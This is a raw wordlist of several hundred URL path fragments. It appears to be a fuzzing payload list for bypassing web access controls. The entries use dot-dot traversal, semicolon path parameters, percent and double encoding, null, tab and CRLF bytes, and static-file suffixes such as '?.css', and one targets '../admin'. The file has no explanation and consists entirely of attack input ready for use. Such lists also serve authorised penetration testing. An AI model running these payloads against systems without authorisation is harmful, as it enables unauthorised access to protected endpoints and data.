;
;?
;/.;.
;/..
;/..;
;/../
;/../;/
;/../;/../
;/../.;/../
;/../../
;/../..//
;/.././../
;/..//
;/..//../
;/..///
;/..//%2e%2e/
;/..//%2f
;/../%2f/
;/..%2f
;/..%2f..%2f
;/..%2f/
;/..%2f//
;/..%2f%2f../
;/.%2e
;/.%2e/%2e%2e/%2f
;//..
;//../../
;///..
;///../
;///..//
;//%2f../
;/%2e.
;/%2e%2e
;/%2e%2e/
;/%2e%2e%2f/
;/%2e%2e%2f%2f
;/%2f/../
;/%2f/..%2f
;/%2f%2f../
;%09
;%09;
;%09..
;%09..;
;%2f;/;/..;/
;%2f;//../
;%2f..
;%2F..
;%2f..;/;//
;%2f..;//;/
;%2f..;///
;%2f../;/;/
;%2f../;/;/;
;%2f../;//
;%2f..//;/
;%2f..//;/;
;%2f..//../
;%2f..//..%2f
;%2f..///
;%2f..///;
;%2f../%2f../
;%2f../%2f..%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/../
;%2f..%2f/..%2f
;%2f..%2f%2e%2e%2f%2f
;%2f/;/..;/
;%2f/;/../
;%2f//..;/
;%2f//../
;%2f//..%2f
;%2f/%2f../
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../
;aaa.js
;aaa.txt
;x
;x;
;x/
?
?;
??
?.css
?.js
?.php
?#
?a.css
?a.jpg
?a.js
?a.png
..
..;/
..;\
..;\;
..;%00/
..;%0d/
..;%ff/
../
.././
../admin
..\
..\;
..%00;/
..%00/
..%00/;
..%09
..%0d;/
..%0d/
..%0d/;
..%2f
..%5c
..%5c/
..%ff
..%ff;/
..%ff/
..%ff/;
./
.%2e/
.%2f
.2e/
.html
.json
@
/
/;?
/;/
/;//
/;x
/;x/
/?
/?;
/.;/
/.;//
/..
/..;/
/..;/;/
/..;/;/..;/
/..;/..;/
/..;/../
/..;//
/..;//..;/
/..;//../
/..;%2f
/..;%2f..;%2f
/..;%2f..;%2f..;%2f
/../
/../;/
/../;/../
/../.;/../
/../..;/
/../../
/../../../
/../../..//
/../..//
/../..//../
/.././../
/..//
/..//..;/
/..//../
/..//../../
/..\
/..%00/
/..%0d/
/..%2f
/..%2f..%2f
/..%2f..%2f..%2f
/..%5c
/..%ff/
/./
/.//
/.%2e/
//
//;/
//.;/
//..
//..;
//../../
//./
///
///..
///..;
///..;/
///..;//
///../
///..//
//%2f
/#
/%20
/%20#
/%20%23
/%23
/%252e/
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252f
/%26
/%2e/
/%2e//
/%2e%2e
/%2e%2e/
/%2e%2e%2f
/%2e%2e%2f/
/%2e%2e%3b/
/%2e%2f/
/%2e%3b/
/%2e%3b//
/%2f
/%2f/
/%3b/
/%3f
/css/../
/js/../
/x/;/..;/
/x/;/../
/x/..;/
/x/..;/;/
/x/..;//
/x/../
/x/../;/
/x/..//
/x//..;/
/x//../
\..\.\
&
#
#?
%
%09
%09;
%09..
%09%3b
%20
%20/
%23
%23%3f
%252f/
%252f%252f
%26
%2e%2e
%2e%2e/
%2e%2e%2f
%2f
%2f;?
%2f?;
%2f/
%2f//
%2f/%2f
%2f%20%23
%2f%23
%2f%2f
%2f%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%3b
%3b/..
%3b//%2f../
%3b/%2e.
%3b/%2e%2e/..%2f%2f
%3b/%2f%2f../
%3b%09
%3b%2f..
%3b%2f%2e.
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3f
%3f.css
%3f.js
%3f.php
%3f%23
%3f%3f
%x%x%x%x%x